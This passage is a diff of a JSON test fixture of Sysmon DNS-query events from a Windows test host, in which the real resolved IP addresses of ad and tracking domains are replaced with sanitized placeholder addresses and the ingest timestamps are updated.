cookiesyncing-1395500543.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.692Z", @@ -11921,11 +11793,11 @@ "type": "CNAME" }, { - "data": "151.139.128.14", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -11933,7 +11805,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -11941,7 +11813,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -11949,7 +11821,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -11957,21 +11829,21 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" } ], "resolved_ip": [ - "151.139.128.14", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "network": { @@ -11987,22 +11859,22 @@ "ocsp.comodoca.com" ], "ip": [ - "151.139.128.14", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313895263Z", + "ingested": "2021-12-09T13:49:44.739676900Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692837600Z'/\u003e\u003cEventRecordID\u003e144\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.185\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.comodoca.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t3j2g9x7.stackpathcdn.com;::ffff:151.139.128.14;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692837600Z'/\u003e\u003cEventRecordID\u003e144\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.185\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.comodoca.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t3j2g9x7.stackpathcdn.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.692Z", @@ -12074,27 +11946,27 @@ "type": "CNAME" }, { - "data": "151.101.2.49", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.66.49", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.130.49", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.194.49", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "151.101.2.49", - "151.101.66.49", - "151.101.130.49", - "151.101.194.49" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156" ] }, "network": { @@ -12112,16 +11984,13 @@ "sync-tm.everesttech.net" ], "ip": [ - "151.101.2.49", - "151.101.66.49", - "151.101.130.49", - "151.101.194.49" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313896639Z", + "ingested": "2021-12-09T13:49:44.739681400Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692848900Z'/\u003e\u003cEventRecordID\u003e145\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.189\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync-tm.everesttech.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 sync.tubemogul.com;type: 5 syncf.tubemogul.com;type: 5 h2.shared.global.fastly.net;::ffff:151.101.2.49;::ffff:151.101.66.49;::ffff:151.101.130.49;::ffff:151.101.194.49;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692848900Z'/\u003e\u003cEventRecordID\u003e145\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.189\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync-tm.everesttech.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 sync.tubemogul.com;type: 5 syncf.tubemogul.com;type: 5 h2.shared.global.fastly.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.692Z", @@ -12181,11 +12050,11 @@ }, "answers": [ { - "data": "34.95.92.78", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -12193,7 +12062,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -12201,7 +12070,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -12209,7 +12078,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -12217,7 +12086,7 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" }, { @@ -12225,23 +12094,23 @@ "type": "AAAA" }, { - "data": "192.35.51.30", + "data": "192.168.51.30", "type": "A" } ], "resolved_ip": [ - "34.95.92.78", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30", - "192.35.51.30" + "192.168.51.30" ] }, "network": { @@ -12256,24 +12125,24 @@ "idsync.rlcdn.com" ], "ip": [ - "34.95.92.78", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30", - "192.35.51.30" + "192.168.51.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313898380Z", + "ingested": "2021-12-09T13:49:44.739686700Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692865100Z'/\u003e\u003cEventRecordID\u003e146\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.237\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eidsync.rlcdn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:34.95.92.78;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;192.35.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692865100Z'/\u003e\u003cEventRecordID\u003e146\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.237\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eidsync.rlcdn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;192.168.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.692Z", @@ -12337,37 +12206,37 @@ "type": "CNAME" }, { - "data": "37.157.2.239", + "data": "89.160.20.156", "type": "A" }, { - "data": "37.157.6.253", + "data": "89.160.20.156", "type": "A" }, { - "data": "37.157.2.238", + "data": "89.160.20.156", "type": "A" }, { - "data": "37.157.4.25", + "data": "89.160.20.156", "type": "A" }, { - "data": "37.157.4.24", + "data": "89.160.20.156", "type": "A" }, { - "data": "37.157.6.247", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "37.157.2.239", - "37.157.6.253", - "37.157.2.238", - "37.157.4.25", - "37.157.4.24", - "37.157.6.247" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156" ] }, "network": { @@ -12383,18 +12252,13 @@ "cm.adform.net" ], "ip": [ - "37.157.2.239", - "37.157.6.253", - "37.157.2.238", - "37.157.4.25", - "37.157.4.24", - "37.157.6.247" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313899666Z", + "ingested": "2021-12-09T13:49:44.739691900Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692882700Z'/\u003e\u003cEventRecordID\u003e147\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.274\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecm.adform.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 track-eu.adformnet.akadns.net;::ffff:37.157.2.239;::ffff:37.157.6.253;::ffff:37.157.2.238;::ffff:37.157.4.25;::ffff:37.157.4.24;::ffff:37.157.6.247;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692882700Z'/\u003e\u003cEventRecordID\u003e147\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.274\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecm.adform.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 track-eu.adformnet.akadns.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.692Z", @@ -12454,12 +12318,12 @@ }, "answers": [ { - "data": "37.18.16.16", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "37.18.16.16" + "89.160.20.156" ] }, "network": { @@ -12474,13 +12338,13 @@ "dm.hybrid.ai" ], "ip": [ - "37.18.16.16" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313900936Z", + "ingested": "2021-12-09T13:49:44.739697800Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692891900Z'/\u003e\u003cEventRecordID\u003e148\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.302\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edm.hybrid.ai\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:37.18.16.16;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692891900Z'/\u003e\u003cEventRecordID\u003e148\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.302\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edm.hybrid.ai\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.692Z", @@ -12544,11 +12408,11 @@ "type": "CNAME" }, { - "data": "199.166.0.32", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -12556,7 +12420,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -12564,7 +12428,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -12572,7 +12436,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -12580,21 +12444,21 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" } ], "resolved_ip": [ - "199.166.0.32", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "network": { @@ -12610,22 +12474,22 @@ "static.adsafeprotected.com" ], "ip": [ - "199.166.0.32", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313902306Z", + "ingested": "2021-12-09T13:49:44.739703600Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692904200Z'/\u003e\u003cEventRecordID\u003e149\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.304\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatic.adsafeprotected.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 anycast.static.adsafeprotected.com;::ffff:199.166.0.32;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated 